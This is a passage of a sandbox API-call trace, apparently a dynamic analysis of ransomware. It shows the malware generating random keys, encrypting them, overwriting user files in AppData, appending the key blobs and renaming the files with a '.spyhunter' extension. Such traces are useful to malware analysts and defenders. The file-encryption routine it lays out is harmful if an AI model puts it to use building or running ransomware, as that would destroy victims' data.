(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0151.210] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248eefc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248eefc*=0x2ac, lpOverlapped=0x0) returned 1 [0151.211] CloseHandle (hObject=0xb0) returned 1 [0151.211] GetProcessHeap () returned 0x2c0000 [0151.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f67638 | out: hHeap=0x2c0000) returned 1 [0151.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee98 | out: pbBuffer=0x248ee98) returned 1 [0151.211] GetProcessHeap () returned 0x2c0000 [0151.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.211] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee90*=0x30) returned 1 [0151.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.212] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties") returned 92 [0151.212] StrStrW (lpFirst="deployment.properties", lpSrch=".txt") returned 0x0 [0151.212] GetProcessHeap () returned 0x2c0000 [0151.212] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.212] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee54*=0x2cf, lpOverlapped=0x0) returned 1 [0151.373] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.373] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x248ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee54*=0x2cf, lpOverlapped=0x0) returned 1 [0151.373] GetProcessHeap () returned 0x2c0000 [0151.373] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.373] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.374] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee54, lpOverlapped=0x0 | out: lpBuffer=0x248ee94*, lpNumberOfBytesWritten=0x248ee54*=0x4, lpOverlapped=0x0) returned 1 [0151.374] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee54*=0x30, lpOverlapped=0x0) returned 1 [0151.374] CloseHandle (hObject=0xb0) returned 1 [0151.374] GetProcessHeap () returned 0x2c0000 [0151.374] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.374] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.spyhunter") returned 102 [0151.374] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\deployment.properties.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\deployment\\deployment.properties.spyhunter")) returned 1 [0151.375] GetProcessHeap () returned 0x2c0000 [0151.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.375] GetProcessHeap () returned 0x2c0000 [0151.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.375] GetProcessHeap () returned 0x2c0000 [0151.375] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f61510 | out: hHeap=0x2c0000) returned 1 [0151.375] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee98 | out: pbBuffer=0x248ee98) returned 1 [0151.375] GetProcessHeap () returned 0x2c0000 [0151.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.375] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee90*=0x30) returned 1 [0151.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.376] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml") returned 111 [0151.376] StrStrW (lpFirst="www.msn[1].xml", lpSrch=".txt") returned 0x0 [0151.376] GetProcessHeap () returned 0x2c0000 [0151.376] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.376] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee54*=0x344, lpOverlapped=0x0) returned 1 [0151.556] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffcbc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.556] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x248ee54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee54*=0x344, lpOverlapped=0x0) returned 1 [0151.556] GetProcessHeap () returned 0x2c0000 [0151.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.557] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.557] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee54, lpOverlapped=0x0 | out: lpBuffer=0x248ee94*, lpNumberOfBytesWritten=0x248ee54*=0x4, lpOverlapped=0x0) returned 1 [0151.557] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee54*=0x30, lpOverlapped=0x0) returned 1 [0151.557] CloseHandle (hObject=0xb0) returned 1 [0151.557] GetProcessHeap () returned 0x2c0000 [0151.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0151.557] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.spyhunter") returned 121 [0151.557] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\VGMTOI09\\www.msn[1].xml.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\vgmtoi09\\www.msn[1].xml.spyhunter")) returned 1 [0151.558] GetProcessHeap () returned 0x2c0000 [0151.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0151.558] GetProcessHeap () returned 0x2c0000 [0151.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.558] GetProcessHeap () returned 0x2c0000 [0151.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0178 | out: hHeap=0x2c0000) returned 1 [0151.558] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee90 | out: pbBuffer=0x248ee90) returned 1 [0151.558] GetProcessHeap () returned 0x2c0000 [0151.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.558] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee88*=0x30) returned 1 [0151.558] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.559] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150") returned 152 [0151.559] StrStrW (lpFirst="BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150", lpSrch=".txt") returned 0x0 [0151.559] GetProcessHeap () returned 0x2c0000 [0151.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.559] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee4c*=0x204, lpOverlapped=0x0) returned 1 [0151.677] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffdfc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.677] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x204, lpNumberOfBytesWritten=0x248ee4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee4c*=0x204, lpOverlapped=0x0) returned 1 [0151.677] GetProcessHeap () returned 0x2c0000 [0151.677] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.677] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.677] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee4c, lpOverlapped=0x0 | out: lpBuffer=0x248ee8c*, lpNumberOfBytesWritten=0x248ee4c*=0x4, lpOverlapped=0x0) returned 1 [0151.677] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee4c*=0x30, lpOverlapped=0x0) returned 1 [0151.678] CloseHandle (hObject=0xb0) returned 1 [0151.692] GetProcessHeap () returned 0x2c0000 [0151.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.692] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.spyhunter") returned 162 [0151.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\BC570EC0DE58335AFAF92FDC8E3AA330_6CE6E578B5C8485B4BE3C4D58E12F150.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\bc570ec0de58335afaf92fdc8e3aa330_6ce6e578b5c8485b4be3c4d58e12f150.spyhunter")) returned 1 [0151.693] GetProcessHeap () returned 0x2c0000 [0151.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.693] GetProcessHeap () returned 0x2c0000 [0151.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.693] GetProcessHeap () returned 0x2c0000 [0151.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fec818 | out: hHeap=0x2c0000) returned 1 [0151.693] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee90 | out: pbBuffer=0x248ee90) returned 1 [0151.693] GetProcessHeap () returned 0x2c0000 [0151.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.693] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee88*=0x30) returned 1 [0151.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E") returned 152 [0151.694] StrStrW (lpFirst="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", lpSrch=".txt") returned 0x0 [0151.694] GetProcessHeap () returned 0x2c0000 [0151.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.694] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee4c*=0x182, lpOverlapped=0x0) returned 1 [0151.695] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.695] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x182, lpNumberOfBytesWritten=0x248ee4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee4c*=0x182, lpOverlapped=0x0) returned 1 [0151.695] GetProcessHeap () returned 0x2c0000 [0151.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.695] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.695] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee4c, lpOverlapped=0x0 | out: lpBuffer=0x248ee8c*, lpNumberOfBytesWritten=0x248ee4c*=0x4, lpOverlapped=0x0) returned 1 [0151.695] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee4c*=0x30, lpOverlapped=0x0) returned 1 [0151.695] CloseHandle (hObject=0xb0) returned 1 [0151.695] GetProcessHeap () returned 0x2c0000 [0151.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.695] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.spyhunter") returned 162 [0151.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9c888beabccbc2a97b0d6d9214c3ba37_1213dc6f71e4c3b05e7bceebc203a31e.spyhunter")) returned 1 [0151.696] GetProcessHeap () returned 0x2c0000 [0151.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.696] GetProcessHeap () returned 0x2c0000 [0151.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.696] GetProcessHeap () returned 0x2c0000 [0151.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2febee8 | out: hHeap=0x2c0000) returned 1 [0151.696] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee88 | out: pbBuffer=0x248ee88) returned 1 [0151.696] GetProcessHeap () returned 0x2c0000 [0151.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.697] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248ee80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248ee80*=0x30) returned 1 [0151.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0151.697] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 152 [0151.697] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".txt") returned 0x0 [0151.697] GetProcessHeap () returned 0x2c0000 [0151.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0151.697] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee44*=0x186, lpOverlapped=0x0) returned 1 [0151.698] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0151.698] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x248ee44, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee44*=0x186, lpOverlapped=0x0) returned 1 [0151.698] GetProcessHeap () returned 0x2c0000 [0151.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0151.701] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0151.701] WriteFile (in: hFile=0xb0, lpBuffer=0x248ee84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee44, lpOverlapped=0x0 | out: lpBuffer=0x248ee84*, lpNumberOfBytesWritten=0x248ee44*=0x4, lpOverlapped=0x0) returned 1 [0151.701] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee44, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee44*=0x30, lpOverlapped=0x0) returned 1 [0151.701] CloseHandle (hObject=0xb0) returned 1 [0151.701] GetProcessHeap () returned 0x2c0000 [0151.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0151.701] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.spyhunter") returned 162 [0151.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.spyhunter")) returned 1 [0151.702] GetProcessHeap () returned 0x2c0000 [0151.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0151.702] GetProcessHeap () returned 0x2c0000 [0151.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0151.702] GetProcessHeap () returned 0x2c0000 [0151.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2febc00 | out: hHeap=0x2c0000) returned 1 [0151.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ee88 | out: pbBuffer=0x248ee88) returned 1 [0151.702] GetProcessHeap () returned 0x2c0000 [0151.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0151.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, 